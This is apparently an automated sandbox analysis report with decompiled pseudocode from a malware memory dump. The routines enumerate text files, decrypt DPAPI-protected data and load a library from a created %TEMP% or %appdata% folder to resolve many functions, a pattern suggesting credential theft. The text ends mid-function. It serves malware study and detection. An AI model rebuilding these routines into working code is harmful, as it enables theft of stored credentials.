                                                                                                                                                                                              0x0041176d
                                                                                                                                                                                              0x00411779
                                                                                                                                                                                              0x00411780
                                                                                                                                                                                              0x00411783
                                                                                                                                                                                              0x00411786
                                                                                                                                                                                              0x00411796
                                                                                                                                                                                              0x004117a1
                                                                                                                                                                                              0x004117b1
                                                                                                                                                                                              0x004117bc
                                                                                                                                                                                              0x004117cc
                                                                                                                                                                                              0x004117de

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$File$CloseFirstFreeNextString
                                                                                                                                                                                              • String ID: .txt$\*.*
                                                                                                                                                                                              • API String ID: 2008072091-2615687548
                                                                                                                                                                                              • Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                                                                                                              • Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00411590, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                              			E00411590(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _v24;
				struct _WIN32_FIND_DATAW _v616;
				char _v620;
				intOrPtr _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				void* _t107;
				intOrPtr _t112;
				intOrPtr _t127;
				intOrPtr _t141;
				intOrPtr _t145;
				intOrPtr _t146;

				_t143 = __esi;
				_t142 = __edi;
				_t110 = __ebx;
				_t145 = _t146;
				_push(__ecx);
				_t112 = 0x52;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_t1 =  &_v8;
				 *_t1 = _t112;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				_push(_t145);
				_push(0x4117df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t146;
				E00403DB8( &_v620, L"\\*.*", _v8, 0);
				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
				do {
					_push(_v8);
					_push(0x411808);
					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
					_push(_v628);
					_push(0x411808);
					E0040813C(0x1f,  &_v632);
					_push(_v632);
					E00403E1C();
					if(E004076B0(_v624, _t110, 0x104) != 0) {
						_push(_t145);
						_push(0x411753);
						_push( *[fs:eax]);
						 *[fs:eax] = _t146;
						_push(_v8);
						_push(0x411808);
						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
						_push(_v648);
						_push(0x411808);
						E0040813C(0x1f,  &_v652);
						_push(_v652);
						E00403E1C();
						E00410900(_v644, _t110,  &_v640, _t142, _t143);
						E0040377C( &_v636, _v640);
						_push(_v636);
						_push(_v16);
						_push(0x411808);
						_push(_v12);
						_push(E00411810);
						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
						_push(_v664);
						_push(L".txt");
						E00403E1C();
						E0040377C( &_v656, _v660);
						_pop(_t107);
						E0040DCE8(_t107, _t110, _v656, _t142, _t143);
						_pop(_t141);
						 *[fs:eax] = _t141;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(E004117E6);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}


























                                                                                                                                                                                              0x00411590
                                                                                                                                                                                              0x00411590
                                                                                                                                                                                              0x00411590
                                                                                                                                                                                              0x00411591
                                                                                                                                                                                              0x00411593
                                                                                                                                                                                              0x00411594
                                                                                                                                                                                              0x00411599
                                                                                                                                                                                              0x00411599
                                                                                                                                                                                              0x0041159b
                                                                                                                                                                                              0x0041159d
                                                                                                                                                                                              0x0041159d
                                                                                                                                                                                              0x004115a0
                                                                                                                                                                                              0x004115a0
                                                                                                                                                                                              0x004115a3
                                                                                                                                                                                              0x004115a4
                                                                                                                                                                                              0x004115a5
                                                                                                                                                                                              0x004115a6
                                                                                                                                                                                              0x004115a9
                                                                                                                                                                                              0x004115ac
                                                                                                                                                                                              0x004115b2
                                                                                                                                                                                              0x004115ba
                                                                                                                                                                                              0x004115c2
                                                                                                                                                                                              0x004115c9
                                                                                                                                                                                              0x004115ca
                                                                                                                                                                                              0x004115cf
                                                                                                                                                                                              0x004115d2
                                                                                                                                                                                              0x004115ea
                                                                                                                                                                                              0x00411600
                                                                                                                                                                                              0x00411603
                                                                                                                                                                                              0x00411603
                                                                                                                                                                                              0x00411606
                                                                                                                                                                                              0x0041161c
                                                                                                                                                                                              0x00411621
                                                                                                                                                                                              0x00411627
                                                                                                                                                                                              0x00411637
                                                                                                                                                                                              0x0041163c
                                                                                                                                                                                              0x0041164d
                                                                                                                                                                                              0x0041165f
                                                                                                                                                                                              0x00411667
                                                                                                                                                                                              0x00411668
                                                                                                                                                                                              0x0041166d
                                                                                                                                                                                              0x00411670
                                                                                                                                                                                              0x00411673
                                                                                                                                                                                              0x00411676
                                                                                                                                                                                              0x0041168c
                                                                                                                                                                                              0x00411691
                                                                                                                                                                                              0x00411697
                                                                                                                                                                                              0x004116a7
                                                                                                                                                                                              0x004116ac
                                                                                                                                                                                              0x004116bd
                                                                                                                                                                                              0x004116ce
                                                                                                                                                                                              0x004116df
                                                                                                                                                                                              0x004116ea
                                                                                                                                                                                              0x004116eb
                                                                                                                                                                                              0x004116ee
                                                                                                                                                                                              0x004116f3
                                                                                                                                                                                              0x004116f6
                                                                                                                                                                                              0x0041170c
                                                                                                                                                                                              0x00411711
                                                                                                                                                                                              0x00411717
                                                                                                                                                                                              0x00411727
                                                                                                                                                                                              0x00411738
                                                                                                                                                                                              0x00411743
                                                                                                                                                                                              0x00411744
                                                                                                                                                                                              0x0041174b
                                                                                                                                                                                              0x0041174e
                                                                                                                                                                                              0x0041174e
                                                                                                                                                                                              0x0041176d
                                                                                                                                                                                              0x00411779
                                                                                                                                                                                              0x00411780
                                                                                                                                                                                              0x00411783
                                                                                                                                                                                              0x00411786
                                                                                                                                                                                              0x00411796
                                                                                                                                                                                              0x004117a1
                                                                                                                                                                                              0x004117b1
                                                                                                                                                                                              0x004117bc
                                                                                                                                                                                              0x004117cc
                                                                                                                                                                                              0x004117de

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$File$CloseFirstFreeNextString
                                                                                                                                                                                              • String ID: .txt$\*.*
                                                                                                                                                                                              • API String ID: 2008072091-2615687548
                                                                                                                                                                                              • Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                                                                                                              • Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
                                                                                                                                                                                              • Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                                                                                                              • Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004094C4, Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                                                              			E004094C4(intOrPtr __eax, void* __ecx, char __edx) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v36;
				intOrPtr _v40;

				_t19 = __ecx;
				_v20 = __edx;
				_v16 = __eax;
				_push( &_v12);
				_push(1);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v20);
				if( *0x41c7c8() == 0) {
					return E00403538(__ecx, E0040952C);
				}
				E004036DC(__ecx, _v36);
				E00403AC0(_t19, _v40);
				return LocalFree(_v36);
			}








                                                                                                                                                                                              0x004094c8
                                                                                                                                                                                              0x004094ca
                                                                                                                                                                                              0x004094cd
                                                                                                                                                                                              0x004094d5
                                                                                                                                                                                              0x004094d6
                                                                                                                                                                                              0x004094d8
                                                                                                                                                                                              0x004094da
                                                                                                                                                                                              0x004094dc
                                                                                                                                                                                              0x004094de
                                                                                                                                                                                              0x004094e4
                                                                                                                                                                                              0x004094ed
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00409518
                                                                                                                                                                                              0x004094f5
                                                                                                                                                                                              0x00409500
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0040950A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CryptDataFreeLocalUnprotect
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1561624719-0
                                                                                                                                                                                              • Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                                                                                                                                              • Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00404B4C, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                              			E00404B4C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x404bb2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00403748( &_v20, 7,  &_v15);
				E00402988(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00404BB9);
				return E004034E4( &_v20);
			}








                                                                                                                                                                                              0x00404b55
                                                                                                                                                                                              0x00404b5a
                                                                                                                                                                                              0x00404b5b
                                                                                                                                                                                              0x00404b60
                                                                                                                                                                                              0x00404b63
                                                                                                                                                                                              0x00404b72
                                                                                                                                                                                              0x00404b82
                                                                                                                                                                                              0x00404b8d
                                                                                                                                                                                              0x00404b98
                                                                                                                                                                                              0x00404b98
                                                                                                                                                                                              0x00404b9e
                                                                                                                                                                                              0x00404ba1
                                                                                                                                                                                              0x00404ba4
                                                                                                                                                                                              0x00404bb1

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                              • Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                                                                                                                                              • Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
                                                                                                                                                                                              • Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00407A34, Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00407A34() {

				return  *[fs:0x30];
			}



                                                                                                                                                                                              0x00407a3b

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                                                                                                              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040831C, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 323libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E0040831C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				void* _t69;
				void* _t96;
				intOrPtr* _t97;
				intOrPtr* _t103;
				intOrPtr* _t108;
				intOrPtr* _t211;
				void* _t226;
				intOrPtr _t244;
				void* _t270;
				intOrPtr _t272;
				intOrPtr _t273;

				_t269 = __esi;
				 *__eax =  *__eax + __eax;
				_t69 = __eax +  *__eax;
				 *_t69 =  *_t69 + _t69;
				asm("das");
				 *_t69 =  *_t69 + _t69;
				_v117 = _v117 + __edx;
				_t272 = _t273;
				_t226 = 0xd;
				do {
					_push(0);
					_push(0);
					_t226 = _t226 - 1;
					_t277 = _t226;
				} while (_t226 != 0);
				_push(_t226);
				_push(__ebx);
				_push(__esi);
				_v8 = _t69;
				E00403980(_v8);
				_push(_t272);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t273;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi);
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t277);
				E00406258(_v24, 0x41c7bc,  &_v20, _t269, _t277);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t277);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t277);
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t277);
				_t96 = E004076B0(_v40, 0x41c7bc, _v44);
				_t278 = _t96;
				if(_t96 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t278);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t278);
				}
				_t97 =  *0x41b578; // 0x41c6b0
				_t270 =  *((intOrPtr*)( *_t97))(L"PATH", 0, 0);
				_t279 = _t270;
				if(_t270 > 0) {
					E004040B0( &_v12, _t270);
					_t211 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t211))(L"PATH", E00403D3C(_v12), _t270);
				}
				E00403E1C();
				_t103 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t103))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				_t108 =  *0x41b5e4; // 0x41c6b4
				 *((intOrPtr*)( *_t108))(E00403D3C( *0x41c7c0));
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t279);
				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t244);
				 *[fs:eax] = _t244;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}










































                                                                                                                                                                                              0x0040831c
                                                                                                                                                                                              0x0040831e
                                                                                                                                                                                              0x00408320
                                                                                                                                                                                              0x00408322
                                                                                                                                                                                              0x00408324
                                                                                                                                                                                              0x00408325
                                                                                                                                                                                              0x00408327
                                                                                                                                                                                              0x00408329
                                                                                                                                                                                              0x0040832b
                                                                                                                                                                                              0x00408330
                                                                                                                                                                                              0x00408330
                                                                                                                                                                                              0x00408332
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408337
                                                                                                                                                                                              0x00408338
                                                                                                                                                                                              0x00408339
                                                                                                                                                                                              0x0040833b
                                                                                                                                                                                              0x00408341
                                                                                                                                                                                              0x00408352
                                                                                                                                                                                              0x00408353
                                                                                                                                                                                              0x00408358
                                                                                                                                                                                              0x0040835b
                                                                                                                                                                                              0x0040835e
                                                                                                                                                                                              0x00408368
                                                                                                                                                                                              0x00408373
                                                                                                                                                                                              0x0040837e
                                                                                                                                                                                              0x00408389
                                                                                                                                                                                              0x0040838e
                                                                                                                                                                                              0x00408393
                                                                                                                                                                                              0x00408396
                                                                                                                                                                                              0x004083a3
                                                                                                                                                                                              0x004083ae
                                                                                                                                                                                              0x004083b8
                                                                                                                                                                                              0x004083c7
                                                                                                                                                                                              0x004083d1
                                                                                                                                                                                              0x004083de
                                                                                                                                                                                              0x004083eb
                                                                                                                                                                                              0x004083f3
                                                                                                                                                                                              0x004083f8
                                                                                                                                                                                              0x004083fa
                                                                                                                                                                                              0x004083fc
                                                                                                                                                                                              0x00408401
                                                                                                                                                                                              0x00408404
                                                                                                                                                                                              0x00408411
                                                                                                                                                                                              0x0040841c
                                                                                                                                                                                              0x00408426
                                                                                                                                                                                              0x00408435
                                                                                                                                                                                              0x0040843f
                                                                                                                                                                                              0x0040843f
                                                                                                                                                                                              0x0040844d
                                                                                                                                                                                              0x00408456
                                                                                                                                                                                              0x00408458
                                                                                                                                                                                              0x0040845a
                                                                                                                                                                                              0x00408461
                                                                                                                                                                                              0x00408475
                                                                                                                                                                                              0x0040847c
                                                                                                                                                                                              0x0040847c
                                                                                                                                                                                              0x00408490
                                                                                                                                                                                              0x004084a3
                                                                                                                                                                                              0x004084aa
                                                                                                                                                                                              0x004084b4
                                                                                                                                                                                              0x004084bb
                                                                                                                                                                                              0x004084c9
                                                                                                                                                                                              0x004084d6
                                                                                                                                                                                              0x004084e9
                                                                                                                                                                                              0x004084ee
                                                                                                                                                                                              0x004084fc
                                                                                                                                                                                              0x00408512
                                                                                                                                                                                              0x0040851f
                                                                                                                                                                                              0x00408535
                                                                                                                                                                                              0x00408542
                                                                                                                                                                                              0x00408558
                                                                                                                                                                                              0x00408565
                                                                                                                                                                                              0x0040857b
                                                                                                                                                                                              0x00408588
                                                                                                                                                                                              0x0040859e
                                                                                                                                                                                              0x004085ab
                                                                                                                                                                                              0x004085c1
                                                                                                                                                                                              0x004085ce
                                                                                                                                                                                              0x004085e4
                                                                                                                                                                                              0x004085f1
                                                                                                                                                                                              0x00408607
                                                                                                                                                                                              0x00408614
                                                                                                                                                                                              0x0040862a
                                                                                                                                                                                              0x00408637
                                                                                                                                                                                              0x0040864d
                                                                                                                                                                                              0x0040865a
                                                                                                                                                                                              0x00408670
                                                                                                                                                                                              0x0040867d
                                                                                                                                                                                              0x00408693
                                                                                                                                                                                              0x004086a0
                                                                                                                                                                                              0x004086b6
                                                                                                                                                                                              0x004086c2
                                                                                                                                                                                              0x00408730
                                                                                                                                                                                              0x00408730
                                                                                                                                                                                              0x004086c2
                                                                                                                                                                                              0x00408739
                                                                                                                                                                                              0x0040873c
                                                                                                                                                                                              0x0040873f
                                                                                                                                                                                              0x0040874c
                                                                                                                                                                                              0x00408759
                                                                                                                                                                                              0x00408766
                                                                                                                                                                                              0x00408773
                                                                                                                                                                                              0x00408780

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                              • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                              • API String ID: 1305945209-1089150275
                                                                                                                                                                                              • Opcode ID: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
                                                                                                                                                                                              • Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00408324, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 319libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00408324(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t102;
				intOrPtr* _t107;
				intOrPtr* _t210;
				void* _t225;
				intOrPtr _t243;
				void* _t269;
				intOrPtr _t271;
				intOrPtr _t272;

				_t268 = __esi;
				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t271 = _t272;
				_t225 = 0xd;
				do {
					_push(0);
					_push(0);
					_t225 = _t225 - 1;
					_t274 = _t225;
				} while (_t225 != 0);
				_push(_t225);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t271);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t272;
